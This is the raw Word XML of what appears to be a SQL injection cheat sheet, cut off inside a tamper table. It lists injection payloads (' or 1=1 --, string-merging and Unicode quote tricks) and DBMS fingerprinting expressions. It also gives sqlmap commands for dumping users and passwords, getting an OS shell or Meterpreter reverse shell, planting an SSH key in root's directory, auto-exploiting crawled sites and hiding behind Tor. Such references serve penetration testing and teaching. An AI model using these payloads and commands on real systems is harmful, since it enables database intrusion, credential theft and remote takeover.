    <w:p w14:paraId="68441FA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p>
    <w:p w14:paraId="187FC10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%3B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C340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lastRenderedPageBreak/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D05DE1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Wildcard (*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1527076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&amp;apos;  # required for XML content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1554DB68"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Multiple encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371F37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2727</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75959EB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25</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27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F63915"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Merging characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF89E7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`+HERP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3174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'||'DERP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32013B3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'+'herp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A665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'DERP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544962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'%20'HERP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134251A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'%2B'HERP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72445A6C"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Logic Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DD5B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05CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>page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asp</w:t>
      </w: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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DEB9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05CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>page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asp</w:t>
      </w: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032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' or 1=1 -- true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1496B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page.asp?id=1" or 1=1 -- true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7AD0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page.asp?id=1 and 1=2 -- false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E67DC6"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Weird characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7073FBA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Unicode character U</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02BA MODIFIER LETTER DOUBLE PRIME (encoded </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> %CA%BA) was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8A36F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transformed into U</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0022</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> QUOTATION MARK (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C9BE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Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA57010"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transformed into U+0027 APOSTROPHE (')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C907C8" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DBMS Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C41B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"conv('a',16,2)=conv('a',16,2)"</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"MYSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B132C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"connection_id()=connection_id()"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"MYSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6432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"crc32('MySQL')=crc32('MySQL')"</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"MYSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B0BD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lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"</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"MSSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D829E7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"@@CONNECTIONS&gt;0"</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"MSSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706D14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"@@CONNECTIONS=@@CONNECTIONS"</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"MSSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97E05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"@@CPU_BUSY=@@CPU_BUSY"</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"MSSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C866F5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"USER_ID(1)=USER_ID(1)"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"MSSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6AB24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"ROWNUM=ROWNUM"</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"ORACLE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54470F4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"RAWTOHEX('AB')=RAWTOHEX('AB')"</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"ORACLE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452333B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"LNNVL(0=123)"</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"ORACLE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72841AD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"5::int=5"</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"POSTGRESQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107AE9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"5::integer=5"</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"POSTGRESQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2692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"pg_client_encoding()=pg_client_encoding()"</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"POSTGRESQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73496FE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"get_current_ts_config()=get_current_ts_config()"</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"POSTGRESQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6358117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"quote_literal(42.5)=quote_literal(42.5)"</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"POSTGRESQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2125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"current_database()=current_database()"</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"POSTGRESQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A74C5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"sqlite_version()=sqlite_version()"</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"SQLITE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65291F5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"last_insert_rowid()&gt;1"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"SQLITE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4361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"last_insert_rowid()=last_insert_rowid()"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"SQLITE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC7A0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"val(cvar(1))=1"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"MSACCESS"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3599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"IIF(ATN(2)&gt;0,1,0) BETWEEN 2 AND 0"</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"MSACCESS"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1661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"cdbl(1)=cdbl(1)"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"MSACCESS"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5CDC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"1337=1337"</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"MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4343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"'i'='i'"</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"MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE32107" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQL injection using SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376F298"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t>Basic arguments for SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75457E0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sqlmap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url</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"&lt;url&gt;"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p username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user</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agent</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SQLMAP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random</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agent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threads</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10</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risk</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3</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level</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5</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eta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dbms</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MySQL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os</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Linux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banner </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--is-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dba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users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passwords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current</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user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dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060066A1"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t>Load a request file and use mobile user-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DD5A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sqlmap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r sqli.req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safe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url</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http:</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10.10</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10.10</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mobile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safe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freq</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p>
    <w:p w14:paraId="08AB279E"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lastRenderedPageBreak/>
        <w:t>Custom injection in UserAgent/Header/Referer/Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B7CB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python sqlmap.py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"http://example.com"</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data </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"username=admin&amp;password=pass"</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headers</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"x-forwarded-for:127.0.0.1*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D3C2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The injection is located at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4A31D6"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t>Second order injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866AE0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python sqlmap.py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r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tmp</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r.txt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dbms MySQL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second</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order </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://targetapp/wishlist"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v </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762EB00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sqlmap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r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txt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dbms MySQL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second</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order </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://&lt;IP/domain&gt;/joomla/administrator/index.php"</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D </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"joomla"</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dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78242847"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t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A11E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SQL Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE546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python sqlmap.py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"http://example.com/?id=1"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p id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sql</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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8490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915B2E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Simple Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D5EA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python sqlmap.py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"http://example.com/?id=1"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p id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os</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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A5D80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95C914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Dropping a reverse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shell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meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F293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python sqlmap.py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"http://example.com/?id=1"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p id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os</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pwn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551DE31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69D288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SSH Shell by dropping an SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062931C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python sqlmap.py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"http://example.com/?id=1"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p id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file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write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root</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.ssh</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id_rsa.pub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file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destination</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home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user</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.ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566FAF3"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t>Crawl a website with SQLmap and auto-exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB638D0"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sqlmap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"http://example.com/"</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crawl</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random</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agent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batch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forms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threads</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5</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level</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5</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risk</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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE32D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4E1538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batch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non interactive mode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usually Sqlmap will ask you questions</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this accepts the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EFBD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crawl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how deep you want to crawl a site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4820937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forms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Parse and test forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C52733"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lastRenderedPageBreak/>
        <w:t>Using TOR with SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7D9E8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sqlmap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"http://www.target.com"</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tor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tor</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type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SOCKS5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time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sec </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>11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check</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tor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level</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5</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risk</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3</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threads</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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00367F94"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t>Using a proxy with SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8F38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sqlmap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"http://www.target.com"</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proxy</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"http://127.0.0.1:8080"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49338D09"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t>Using Chrome cookie and a Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6785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sqlmap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"https://test.com/index.php?id=99"</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load</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cookie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media</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truecrypt1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TI</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cookie.txt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proxy </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://127.0.0.1:8080"</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-f</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time</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sec </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15</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level </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832CAC3"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t>Using suffix to tamper the injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99870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python sqlmap.py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u </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://example.com/?id=1"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p id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suffix</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 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDE4933" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B92">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>General tamper option and tamper's list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAF6B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tamper</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name_of_the_tamper</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3748"/>
        <w:gridCol w:w="9482"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="563ECA2B" w14:textId="77777777" w:rsidTr="00CC3B9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C734AE" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B92">
            <w:pPr>
              <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC3B92">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Tamper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CB027" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B92">
            <w:pPr>
              <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
